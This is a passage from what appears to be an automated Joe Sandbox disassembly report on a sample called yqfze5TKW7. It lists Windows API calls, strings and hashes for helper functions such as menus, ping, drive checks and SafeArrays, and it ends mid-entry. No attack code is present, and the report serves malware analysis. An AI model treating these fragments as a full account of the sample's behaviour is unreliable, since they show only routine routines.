Part of subcall function 00621B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00622036,?,00000000,?,?,?,?,006216CB,00000000,?), ref: 00621B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006220D3
KillTimer.USER32(-00000001,?,?,?,?,006216CB,00000000,?,?,00621AE2,?,?), ref: 0062216E
DestroyAcceleratorTable.USER32(00000000), ref: 0065BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006216CB,00000000,?,?,00621AE2,?,?), ref: 0065BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006216CB,00000000,?,?,00621AE2,?,?), ref: 0065BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006216CB,00000000,?,?,00621AE2,?,?), ref: 0065BD0A
DeleteObject.GDI32(00000000), ref: 0065BD1C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: ea4ab8fc60348ed886d5a68d426fef24fb34fe4abc453eab9588dd12c8b1446c
Instruction ID: 40e0a9c1373689fc4da8f0d9b98314e0e713aa84ef52cdb4d222f7c5847fe77f
Opcode Fuzzy Hash: ea4ab8fc60348ed886d5a68d426fef24fb34fe4abc453eab9588dd12c8b1446c
Instruction Fuzzy Hash: 5C618D31100B61EFCB25AF14E9A8B66B7F3FF41316F106528E9824A670C771A895DF91

Function 006221A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 006225DB: GetWindowLongW.USER32(?,000000EB), ref: 006225EC

GetSysColor.USER32(0000000F), ref: 006221D3

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 0a6d25b0400337c20b74d5fbf13a377258cd18c2e3438ee5a35eb9ce9051be11
Instruction ID: d35278b640ae4bfc5cdc6c136c73bae9bbfd5e43311411e407253da7bc022b89
Opcode Fuzzy Hash: 0a6d25b0400337c20b74d5fbf13a377258cd18c2e3438ee5a35eb9ce9051be11
Instruction Fuzzy Hash: B141D330001951EADB215F68EC98BF93B67EB06321F185365FD619A2E1C7328D42DF22

Function 0068A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,006AF910), ref: 0068A90B
GetDriveTypeW.KERNEL32(00000061,006D89A0,00000061), ref: 0068A9D5
_wcscpy.LIBCMT ref: 0068A9FF

Strings

ramdisk, xrefs: 0068A97F
network, xrefs: 0068A969
removable, xrefs: 0068A93D
unknown, xrefs: 0068A996
cdrom, xrefs: 0068A927
all, xrefs: 0068A911
fixed, xrefs: 0068A953

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 3550d090a352f80d288747c633831efbe9a39d1f0c276a50de6a5840a98dd778
Instruction ID: 82ffaa612b5bd6365bb139e6b5c3f5ac19c8239976f43b993c43b3d932adb8f0
Opcode Fuzzy Hash: 3550d090a352f80d288747c633831efbe9a39d1f0c276a50de6a5840a98dd778
Instruction Fuzzy Hash: F751CD315183109FD744EF54D892AAFB7A7EF84300F044A2EF99A572A2DB319D09CB93

Function 00629837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00629862
__swprintf.LIBCMT ref: 006298AC
__i64tow.LIBCMT ref: 0065F5E6

Strings

%.15g, xrefs: 006298A6
True, xrefs: 0065F5A7
0x%p, xrefs: 0065F5C8
False, xrefs: 0065F5AE

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: a4c92f8a366a366029ad1825dbda47412668b27102b808e4016ecc3b7e746623
Instruction ID: ec2d3ee8d9e9db08f0595ac22ce3074371f79180252978312f6b2f92011602f8
Opcode Fuzzy Hash: a4c92f8a366a366029ad1825dbda47412668b27102b808e4016ecc3b7e746623
Instruction Fuzzy Hash: 4441C571910616AFEB24DF34D842EB673EBEF45300F24486EE949D7391EA359946CF20

Function 006A7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006A716A
CreateMenu.USER32 ref: 006A7185
SetMenu.USER32(?,00000000), ref: 006A7194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006A7221
IsMenu.USER32(?), ref: 006A7237
CreatePopupMenu.USER32 ref: 006A7241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006A726E
DrawMenuBar.USER32 ref: 006A7276

Strings

0, xrefs: 006A7160
F, xrefs: 006A7262

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 91771cd0c8c5a7ce24cfcd719832591fee47092c57ba941ed2fe500b231dab8b
Instruction ID: 4b5131fb6c5546fe0de241194f281812ff23c07c613db0ce5918dbcb5b12aac7
Opcode Fuzzy Hash: 91771cd0c8c5a7ce24cfcd719832591fee47092c57ba941ed2fe500b231dab8b
Instruction Fuzzy Hash: 21411575A01205EFDB20EFA4D994B9ABBB6FF4A310F144429F945A7361D731AE10CF90

Function 006A74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006A755E
CreateCompatibleDC.GDI32(00000000), ref: 006A7565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006A7578
SelectObject.GDI32(00000000,00000000), ref: 006A7580
GetPixel.GDI32(00000000,00000000,00000000), ref: 006A758B
DeleteDC.GDI32(00000000), ref: 006A7594
GetWindowLongW.USER32(?,000000EC), ref: 006A759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006A75B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006A75BE

Strings

static, xrefs: 006A74F6

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 175d9fa82c6edb8d88bf5b5833b21516defacf5447159e13a74ed0d9080bcc84
Instruction ID: ce87678a555655f07cde1d411f97b7811d2062bfc4739c756d7e2e14109761fc
Opcode Fuzzy Hash: 175d9fa82c6edb8d88bf5b5833b21516defacf5447159e13a74ed0d9080bcc84
Instruction Fuzzy Hash: 47316C32504214ABDF11AFA4DC08FDB3B6AFF0A321F111224FA55961A1CB71EC21DFA5

Function 00646E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00646E3E

Part of subcall function 00648B28: __getptd_noexit.LIBCMT ref: 00648B28

__gmtime64_s.LIBCMT ref: 00646ED7
__gmtime64_s.LIBCMT ref: 00646F0D
__gmtime64_s.LIBCMT ref: 00646F2A
__allrem.LIBCMT ref: 00646F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00646F9C
__allrem.LIBCMT ref: 00646FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00646FD1
__allrem.LIBCMT ref: 00646FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00647006
__invoke_watson.LIBCMT ref: 00647077

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: bfa711a2150de4091795e1908dea4f9a69ff641278542b61e014016f9af2f8b0
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 337126B2A00717ABD714AE68CC41BEAB3FAAF01764F10422DF814D7381EB70DD448795

Function 00682527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00682542
GetMenuItemInfoW.USER32(006E5890,000000FF,00000000,00000030), ref: 006825A3
SetMenuItemInfoW.USER32(006E5890,00000004,00000000,00000030), ref: 006825D9
Sleep.KERNEL32(000001F4), ref: 006825EB
GetMenuItemCount.USER32(?), ref: 0068262F
GetMenuItemID.USER32(?,00000000), ref: 0068264B
GetMenuItemID.USER32(?,-00000001), ref: 00682675
GetMenuItemID.USER32(?,?), ref: 006826BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00682700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00682714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00682735

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 773e31ac7f78f0718ba2ca02aa6ea1390ff91b9cba661fa507833f0f063935c9
Instruction ID: af6228cfa680c0e52f1803589714a1592c5caed2658c0d80391e660a8214fa88
Opcode Fuzzy Hash: 773e31ac7f78f0718ba2ca02aa6ea1390ff91b9cba661fa507833f0f063935c9
Instruction Fuzzy Hash: 5D61A47090024AAFDF21EFA4DCA8DFE7BBAFB05304F140259E942A7251D731AD45DB21

Function 006A6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006A6FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006A6FA8
GetWindowLongW.USER32(?,000000F0), ref: 006A6FCC
_memset.LIBCMT ref: 006A6FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006A6FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006A7067

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 676b2b933e2a256fcb397dfc9315924badc36763ef38f57475199aabea6365cb
Instruction ID: 3e7405195817a9da0c1c3dd70b899fcb8aedf7d29877f868785f5b2154b1ea26
Opcode Fuzzy Hash: 676b2b933e2a256fcb397dfc9315924badc36763ef38f57475199aabea6365cb
Instruction Fuzzy Hash: 55617B75900248AFDB10EFA4CC81EEE77FAAB0A714F144159FA15AB3A1C771AD41DF90

Function 00676B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00676BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00676C18
VariantInit.OLEAUT32(?), ref: 00676C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00676C4A
VariantCopy.OLEAUT32(?,?), ref: 00676C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00676CB1
VariantClear.OLEAUT32(?), ref: 00676CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00676CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00676CDC
VariantClear.OLEAUT32(?), ref: 00676CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00676CF9

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: bd7f75f515ea74c8c10b9c6dd0b1014358d2e89d738162be5b66fab0533a5a96
Instruction ID: 2eadf5aaa533cd9589a98d5a12133cc9df570e7d0842fc0feca28d076d75c4ea
Opcode Fuzzy Hash: bd7f75f515ea74c8c10b9c6dd0b1014358d2e89d738162be5b66fab0533a5a96
Instruction Fuzzy Hash: 59417F31A006199FCF00EFA8D8449EEBBBAEF48350F00C069F955E7261DB31A945CFA1

Function 00695732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00695793
inet_addr.WSOCK32(?), ref: 006957D8
gethostbyname.WSOCK32(?), ref: 006957E4
IcmpCreateFile.IPHLPAPI ref: 006957F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00695862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00695878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 006958ED
WSACleanup.WSOCK32 ref: 006958F3

Strings

Ping, xrefs: 00695816

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: bcdabeebcc9ae5ae46529444b363c75dae918bbe4a7499b2f351f332816d6103
Instruction ID: 02634bed6591eac2f52174f2f19f362eab242e0e94a9586ccb917a9253f3b214
Opcode Fuzzy Hash: bcdabeebcc9ae5ae46529444b363c75dae918bbe4a7499b2f351f332816d6103
Instruction Fuzzy Hash: 3951BE31600A109FDB21EF64DD45B6AB7EAEF49320F048929F956DB2A1DB30EC00CF46

Function 0068B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0068B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0068B546
GetLastError.KERNEL32 ref: 0068B550
SetErrorMode.KERNEL32(00000000,READY), ref: 0068B5BD

Strings

UNKNOWN, xrefs: 0068B575
INVALID, xrefs: 0068B58F
NOTREADY, xrefs: 0068B57C
READY, xrefs: 0068B596
READONLY, xrefs: 0068B588

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: c10e9aa85c6c31234c6ad84b1a8f66c4b2f00bacb47930de0560a69712b8a60a
Instruction ID: 93466a28d2d7bccba3079869e5dc8e652b1415a55e34af1fe26052738de29ebb
Opcode Fuzzy Hash: c10e9aa85c6c31234c6ad84b1a8f66c4b2f00bacb47930de0560a69712b8a60a
Instruction Fuzzy Hash: BB31A135A002059FCB10FFA8D885EEE77B6FF49300F10422AF50597391DB71AA42CB92

Function 00678F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Part of subcall function 0067AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0067AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00679014
GetDlgCtrlID.USER32 ref: 0067901F
GetParent.USER32 ref: 0067903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0067903E
GetDlgCtrlID.USER32(?), ref: 00679047
GetParent.USER32(?), ref: 00679063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00679066

Strings

ComboBox, xrefs: 00678F9C
ListBox, xrefs: 00678FD1

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: ca55f97161070bb0beb93f4a0f10cd4d20af983d7046617bcfa02708aecf3799
Instruction ID: 26d00c56b2cc711196a06a87e53bc2573b6079c269ce68be6dea1dde81378c22
Opcode Fuzzy Hash: ca55f97161070bb0beb93f4a0f10cd4d20af983d7046617bcfa02708aecf3799
Instruction Fuzzy Hash: D821D370A00108BBDF14ABA0CC85EFEBBBAEF4A310F10412AF925972A1DB755815DF21

Function 0067907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Part of subcall function 0067AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0067AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006790FD
GetDlgCtrlID.USER32 ref: 00679108
GetParent.USER32 ref: 00679124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00679127
GetDlgCtrlID.USER32(?), ref: 00679130
GetParent.USER32(?), ref: 0067914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0067914F

Strings

ComboBox, xrefs: 00679087
ListBox, xrefs: 006790BC

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 3e93ed2e96d321671f37068b49532e0fec567c7e1eb978a57b5ed780e843bd01
Instruction ID: ca6b9d09216071b813592eb0b3464016b7e546780f75bf2eea5758720eff0158
Opcode Fuzzy Hash: 3e93ed2e96d321671f37068b49532e0fec567c7e1eb978a57b5ed780e843bd01
Instruction Fuzzy Hash: C521F574E00108BBDF10ABA0CC85EFEBBBAEF46300F00401AB915972A1DB755855DF21

Function 00679163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0067916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00679184
_wcscmp.LIBCMT ref: 00679196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00679211

Strings

details, xrefs: 006791BF
SHELLDLL_DefView, xrefs: 00679190
smallicons, xrefs: 006791D9
list, xrefs: 006791F3
largeicons, xrefs: 006791A5

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 2bc031f2cd2db317da17d4fd3c75e988e8b0b9326a192087b0e6bae644179b06
Instruction ID: b41050292504c4650d9c79f6a49ef2caa2286e5997c77b491ea10d39f40fa6be
Opcode Fuzzy Hash: 2bc031f2cd2db317da17d4fd3c75e988e8b0b9326a192087b0e6bae644179b06
Instruction Fuzzy Hash: 7A115C37698307BAFB103624EC27DE737DF9B16320B304027F914E42D2FE62A92159A5

Function 00687990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00687A6C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
